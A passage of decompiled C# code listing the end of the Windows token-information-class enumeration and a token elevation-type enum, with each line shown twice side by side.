// Token: 0x04000030 RID: 48 // Token: 0x04000030 RID: 48
TokenDefaultDacl, TokenDefaultDacl,
// Token: 0x04000031 RID: 49 // Token: 0x04000031 RID: 49
TokenSource, TokenSource,
// Token: 0x04000032 RID: 50 // Token: 0x04000032 RID: 50
TokenType, TokenType,
// Token: 0x04000033 RID: 51 // Token: 0x04000033 RID: 51
TokenImpersonationLevel, TokenImpersonationLevel,
// Token: 0x04000034 RID: 52 // Token: 0x04000034 RID: 52
TokenStatistics, TokenStatistics,
// Token: 0x04000035 RID: 53 // Token: 0x04000035 RID: 53
TokenRestrictedSids, TokenRestrictedSids,
// Token: 0x04000036 RID: 54 // Token: 0x04000036 RID: 54
TokenSessionId, TokenSessionId,
// Token: 0x04000037 RID: 55 // Token: 0x04000037 RID: 55
TokenGroupsAndPrivileges, TokenGroupsAndPrivileges,
// Token: 0x04000038 RID: 56 // Token: 0x04000038 RID: 56
TokenSessionReference, TokenSessionReference,
// Token: 0x04000039 RID: 57 // Token: 0x04000039 RID: 57
TokenSandBoxInert, TokenSandBoxInert,
// Token: 0x0400003A RID: 58 // Token: 0x0400003A RID: 58
TokenAuditPolicy, TokenAuditPolicy,
// Token: 0x0400003B RID: 59 // Token: 0x0400003B RID: 59
TokenOrigin, TokenOrigin,
// Token: 0x0400003C RID: 60 // Token: 0x0400003C RID: 60
TokenElevationType, TokenElevationType,
// Token: 0x0400003D RID: 61 // Token: 0x0400003D RID: 61
TokenLinkedToken, TokenLinkedToken,
// Token: 0x0400003E RID: 62 // Token: 0x0400003E RID: 62
TokenElevation, TokenElevation,
// Token: 0x0400003F RID: 63 // Token: 0x0400003F RID: 63
TokenHasRestrictions, TokenHasRestrictions,
// Token: 0x04000040 RID: 64 // Token: 0x04000040 RID: 64
TokenAccessInformation, TokenAccessInformation,
// Token: 0x04000041 RID: 65 // Token: 0x04000041 RID: 65
TokenVirtualizationAllowed, TokenVirtualizationAllowed,
// Token: 0x04000042 RID: 66 // Token: 0x04000042 RID: 66
TokenVirtualizationEnabled, TokenVirtualizationEnabled,
// Token: 0x04000043 RID: 67 // Token: 0x04000043 RID: 67
TokenIntegrityLevel, TokenIntegrityLevel,
// Token: 0x04000044 RID: 68 // Token: 0x04000044 RID: 68
TokenUiAccess, TokenUiAccess,
// Token: 0x04000045 RID: 69 // Token: 0x04000045 RID: 69
TokenMandatoryPolicy, TokenMandatoryPolicy,
// Token: 0x04000046 RID: 70 // Token: 0x04000046 RID: 70
TokenLogonSid, TokenLogonSid,
// Token: 0x04000047 RID: 71 // Token: 0x04000047 RID: 71
MaxTokenInfoClass MaxTokenInfoClass
} }
// Token: 0x0200000D RID: 13 // Token: 0x0200000D RID: 13
private enum TokenElevationType private enum TokenElevationType
{ {
// Token: 0x04000049 RID: 73 // Token: 0x04000049 RID: 73
TokenElevationTypeDefault = 1, TokenElevationTypeDefault = 1,
// Token: 0x0400004A RID: 74 // Token: 0x0400004A RID: 74
TokenElevationTypeFull, TokenElevationTypeFull,
// Token: 0x0400004B RID: 75 // Token: 0x0400004B RID: 75
TokenElevationTypeLimited TokenElevationTypeLimited
} }
} }
} }
``` ```